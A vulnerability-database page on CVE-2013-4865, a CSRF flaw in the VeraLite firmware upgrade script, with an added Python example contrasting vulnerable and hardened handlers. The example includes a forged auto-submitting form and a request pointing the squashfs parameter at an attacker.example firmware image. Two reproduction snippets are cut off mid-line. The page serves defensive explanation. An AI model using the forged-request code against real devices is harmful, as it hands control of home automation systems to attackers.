VYPR
Unrated severity · NVD Advisory · Published Jan 28, 2020 · Updated Aug 6, 2024

CVE-2013-4865

Description

Cross-site request forgery (CSRF) vulnerability in upgrade_step2.sh in MiCasaVerde VeraLite with firmware 1.5.408 allows remote attackers to hijack the authentication of users for requests that install arbitrary firmware via the squashfs parameter.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

CSRF in MiCasaVerde VeraLite 1.5.408 allows attackers to hijack authentication and install arbitrary firmware via the squashfs parameter.

Vulnerability

Cross-site request forgery (CSRF) vulnerability exists in the upgrade_step2.sh script of MiCasaVerde VeraLite running firmware version 1.5.408. The script does not implement any anti-CSRF tokens or origin validation, allowing an attacker to craft a malicious request that, when executed by an authenticated user, can install arbitrary firmware through the squashfs parameter [1][2][3].

Exploitation

An attacker must trick an authenticated VeraLite administrator or guest user into visiting a crafted webpage or clicking a link while logged into the VeraLite web interface (or the cloud control panel at cp.mios.com). The attacker constructs a request to upgrade_step2.sh with a malicious squashfs parameter pointing to a firmware image under the attacker's control. No additional authentication is needed because the victim's active session is reused [1][2][3].

Impact

Successful exploitation allows an attacker to install arbitrary firmware on the VeraLite device, effectively gaining full control over the home automation controller. This can lead to complete compromise of the device and potentially the connected home automation network, including door locks, security cameras, and other smart home components [1][2][3].

Mitigation

MiCasaVerde has not released a patched firmware version for this vulnerability, and the vendor has indicated that it does not intend to add CSRF protection. Users are advised to restrict network access to the VeraLite, disable remote management where possible, and ensure that only trusted users have access to the local or cloud-based control panel [1][2][3].

AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"The VeraLite firmware upgrade endpoint `/upgrade_step2.sh` performs no CSRF token validation or origin checking, allowing an attacker to forge authenticated firmware-upgrade requests."

Attack vector

An attacker crafts a web page containing an `

Affected code

The vulnerable endpoint is `/upgrade_step2.sh` on the MiCasaVerde VeraLite running firmware 1.5.408 [1][2]. The advisory does not specify the internal implementation of this script, but it accepts a `squashfs` parameter to install arbitrary firmware without any CSRF token or origin validation.

What the fix does

No official patch has been released by the vendor. The vendor responded that the lack of CSRF protection was a deliberate design decision to maintain an open system for customers [1][2]. The advisory recommends mitigating exposure by using access control lists and network segmentation to limit access to authorized personnel [1][2].
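The forged request described under Exploitation, and the two controls this section says the endpoint lacks, side by side. This is an added example, not code from the VeraLite firmware or the advisory: the real `/upgrade_step2.sh` is a CGI script whose internals the advisory does not describe, so only the endpoint path and the `squashfs` parameter are taken from the source. The device address, the session and token stores, and every function name (`csrf_page`, `vulnerable_handler`, `hardened_handler`, `simulate`) are assumptions made for illustration.

```python
# Added example; not code from the VeraLite firmware or the advisory.
# Only the endpoint path and the `squashfs` parameter come from the advisory;
# the device address, session/token stores and all function names are assumed.
import hmac
import secrets
from urllib.parse import urlsplit

DEVICE_ORIGIN = "http://192.168.1.50"      # assumed LAN address of the controller
UPGRADE_PATH = "/upgrade_step2.sh"         # endpoint named in the advisory
_DEFAULT_PORT = {"http": 80, "https": 443}

_csrf_tokens = {}                          # session id -> synchronizer token


def issue_csrf_token(session_id):
    """Mint a per-session token that the legitimate UI embeds in its upgrade form."""
    token = secrets.token_urlsafe(32)
    _csrf_tokens[session_id] = token
    return token


def csrf_page(firmware_url, device_origin=DEVICE_ORIGIN):
    """Constructed attacker page: an auto-submitting cross-site form.
    The victim's browser attaches the VeraLite session cookie on its own;
    the attacker never needs the victim's credentials."""
    return (
        '<html><body onload="document.forms[0].submit()">'
        f'<form method="POST" action="{device_origin}{UPGRADE_PATH}">'
        f'<input type="hidden" name="squashfs" value="{firmware_url}">'
        "</form></body></html>"
    )


def vulnerable_handler(cookies, form, sessions):
    """Model of the flaw: any request carrying a valid session cookie and a
    squashfs parameter is accepted, regardless of where it originated."""
    if cookies.get("session") not in sessions:
        return 401, "login required"
    if "squashfs" not in form:
        return 400, "squashfs parameter required"
    return 200, f"installing {form['squashfs']}"


def _same_origin(url, origin):
    """Compare scheme, host and effective port; 'null' or missing parts never match."""
    a, b = urlsplit(url), urlsplit(origin)
    a_port = a.port or _DEFAULT_PORT.get(a.scheme)
    b_port = b.port or _DEFAULT_PORT.get(b.scheme)
    return a.hostname is not None and (a.scheme, a.hostname, a_port) == (b.scheme, b.hostname, b_port)


def hardened_handler(method, headers, cookies, form, sessions):
    """Same operation with origin validation and a synchronizer token added."""
    sid = cookies.get("session")
    if sid not in sessions:
        return 401, "login required"
    if method != "POST":                   # no state change on GET, so <img>/<iframe> lures fail
        return 405, "POST required"
    source = headers.get("Origin") or headers.get("Referer")
    if source is None or not _same_origin(source, DEVICE_ORIGIN):
        return 403, "cross-site request refused"
    expected = _csrf_tokens.get(sid)
    supplied = form.get("csrf_token", "")
    if expected is None or not hmac.compare_digest(expected, supplied):
        return 403, "missing or invalid CSRF token"
    if "squashfs" not in form:
        return 400, "squashfs parameter required"
    return 200, f"installing {form['squashfs']}"


def simulate():
    """Replay one forged request against both handlers, plus a legitimate one."""
    sessions = {"victim-sid": "admin"}     # constructed: one logged-in administrator
    cookies = {"session": "victim-sid"}    # sent by the browser on every request to the device
    forged = {"squashfs": "http://attacker.example/backdoored.squashfs"}
    token = issue_csrf_token("victim-sid")
    legit = {"squashfs": "https://vendor.example/1.5.408.squashfs", "csrf_token": token}
    return {
        "vulnerable_forged": vulnerable_handler(cookies, forged, sessions)[0],
        "hardened_forged_post": hardened_handler("POST", {"Origin": "http://attacker.example"}, cookies, forged, sessions)[0],
        "hardened_forged_get": hardened_handler("GET", {"Referer": "http://attacker.example/lure"}, cookies, forged, sessions)[0],
        "hardened_no_source": hardened_handler("POST", {}, cookies, forged, sessions)[0],
        "hardened_legit": hardened_handler("POST", {"Origin": DEVICE_ORIGIN}, cookies, legit, sessions)[0],
    }


if __name__ == "__main__":
    for name, status in simulate().items():
        print(f"{name}: {status}")
```

The token check alone is sufficient to stop the forgery; the origin check and the POST requirement are defence in depth for the cases where a token is leaked or a GET-triggering lure (an image tag on a page the victim visits) is used. A request with no `Origin` and no `Referer` is refused rather than allowed, because a browser that strips both under a referrer policy is indistinguishable from a cross-site one. Note that the ACL and segmentation advice in the advisory does not address this at all: the forged request is issued by the victim's own browser from inside the allowed network.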

Preconditions

  • input: The attacker must lure an authenticated VeraLite user to visit a malicious web page (e.g., via phishing or an injected iframe).
  • network: The VeraLite web interface must be network-accessible from the victim's browser (typically on the same LAN).
  • auth: The victim must have an active authenticated session with the VeraLite at the time of the request.

Reproduction

1. Host an HTML page containing: `

Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

3

News mentions

0

No linked articles in our index yet.